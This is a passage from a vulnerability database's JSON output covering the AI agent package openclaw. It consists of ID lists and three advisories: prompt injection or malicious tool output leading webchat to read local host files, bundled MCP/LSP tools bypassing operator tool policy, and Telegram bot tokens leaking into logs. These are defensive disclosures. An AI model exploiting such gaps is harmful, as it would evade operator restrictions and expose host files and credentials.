wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"V
CID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["GHSA-wwrj-437c-ppq4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gj27-bfws-uyfp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89007?format=json","vulnerability_id":"VCID-gk95-28x9-17dk","summary":"OpenClaw: Webchat audio embedding could read local files without local-root containment\n## Impact\n\nOpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment 
check used by other media-serving paths.\n\nIf an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check.\n\nThe impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.14`\n- Patched version: `2026.4.15`\n\nThe latest public release, `2026.4.21`, also contains the fix.\n\n## Patches\n\nThe public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding.\n\nFix commit:\n\n- `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde`\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. 
Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c"},{"reference_url":"https://github.com/advisories/GHSA-gfg9-5357-hv4c","reference_id":"GHSA-gfg9-5357-hv4c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gfg9-5357-hv4c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"}
,{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["GHSA-gfg9-5357-hv4c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gk95-28x9-17dk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89411?format=json","vulnerability_id":"VCID-gkyv-ahk7-1ud3","summary":"OpenClaw: Bundled MCP/LSP tools could bypass configured tool policy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBundled MCP and LSP tools could be appended to the agent's effective tool set after the normal tool-policy pipeline had already filtered core tools. 
If an operator configured a restrictive policy, such as a tool profile, explicit allow/deny list, owner-only tool restriction, sandbox tool policy, or subagent tool policy, a bundled MCP/LSP tool could remain available even though the same policy would have denied it.\n\nThe issue required a configured bundled MCP or LSP tool source and an operator policy that should have restricted that tool. This was a local agent policy-enforcement bypass, not an unauthenticated remote gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now applies a final effective tool policy pass to bundled MCP/LSP tools before merging them into the tool set used by normal runs and compaction. The pass covers profile policy, provider profile policy, global/agent/group policies, owner-only filtering, sandbox tool policy, and subagent tool policy.\n\nFix commit:\n\n- `0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value"
:"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4"},{"reference_url":"https://github.com/advisories/GHSA-qrp5-gfw2-gxv4","reference_id":"GHSA-qrp5-gfw2-gxv4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qrp5-gfw2-gxv4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-qrp5-gfw2-gxv4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gkyv-ahk7-1ud3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91602?format=json","vulnerability_id":"VCID-gncw-wfqt-9yek","summary":"OpenClaw Telegram media fetch errors exposed bot tokens in logged file URLs\n### Summary\n`openclaw` versions `<= 2026.3.12` could include raw Telegram bot tokens in media fetch error strings when inbound Telegram media downloads failed.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: 
`2026.3.13`\n\n### Details\nThe vulnerable path was `fetchRemoteMedia()` in `src/media/fetch.ts`. In affected releases, fetch and HTTP error paths embedded the original Telegram file URL into `MediaFetchError` messages. For Telegram media, those URLs can include `/file/bot<TOKEN>/...`, so the resulting error strings could leak bot tokens into logs, console output, or any downstream error surface that rendered the exception text.\n\nThis issue is in scope under OpenClaw's trust model because the leaked secret is an OpenClaw-operated integration credential, not a user-supplied third-party secret.\n\n### Fix\n`openclaw@2026.3.13` redacts sensitive media URLs before constructing fetch error messages. Current code routes the source URL and follow-on error paths through `redactMediaUrl()` / `redactSensitiveText()`, so Telegram bot tokens are no longer emitted in those error strings.\n\nRegression coverage exists in `src/media/fetch.test.ts` (`redacts Telegram bot tokens from fetch failure messages` and `redacts Telegram bot tokens from HTTP error messages`).\n\n### Fix Commit(s)\n- `7a53eb7ea8295b08be137e231c9a98c1a79b5cd5`\n\nThanks @space08 for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a53eb7ea8295b08be137e231c9a98c1a79b5cd5","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7a53eb7ea8295b08be137e231c9a98c1a79b5cd5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xwcj-hwhf-h378","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xwcj-hwhf-h378"},{"reference_url":"https://github.com/advisories/GHSA-xwcj-hwhf-h378","reference_id":"GHSA-xwcj-hwhf-h378","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xwcj-hwhf-h378"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vul
nerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vul
nerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vul
nerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vul
nerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vul
nerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vul
